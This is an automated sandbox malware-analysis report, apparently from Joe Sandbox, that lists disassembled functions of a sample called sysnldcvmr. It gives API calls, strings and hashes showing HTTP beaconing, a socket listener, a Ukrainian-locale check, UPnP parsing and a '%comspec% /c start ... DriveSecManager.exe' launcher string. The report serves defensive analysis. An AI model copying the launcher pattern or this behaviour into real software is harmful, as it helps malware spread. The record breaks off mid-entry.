                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                    Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                    • wsprintfW.USER32 ref: 00406595
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                    • API String ID: 92872011-32713442
                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                    Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryQueryVirtual
                                                                    • String ID: oA$ oA$ oA
                                                                    • API String ID: 2850889275-3725432611
                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                    Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                    • strcmp.NTDLL ref: 0040E752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocalestrcmp
                                                                    • String ID: UKR
                                                                    • API String ID: 3191669094-64918367
                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                    • String ID: PCOI$ilci
                                                                    • API String ID: 3345448188-3762367603
                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                    Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E518
                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                    • API String ID: 2761394606-2217117414
                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                    Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                    • String ID: PCOI$ilci$.Mw
                                                                    • API String ID: 2403999931-2607080227
                                                                    • Opcode ID: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                    • Opcode Fuzzy Hash: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                    Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040DBE8
                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                    • String ID: <$GET
                                                                    • API String ID: 1205665004-427699995
                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 671207744-0
                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                    Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                    Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                    • Opcode Fuzzy Hash: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                    Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                    Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                    Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID:
                                                                    • API String ID: 673498613-0
                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                    Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                    Strings
                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                    • %comspec%, xrefs: 004064BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
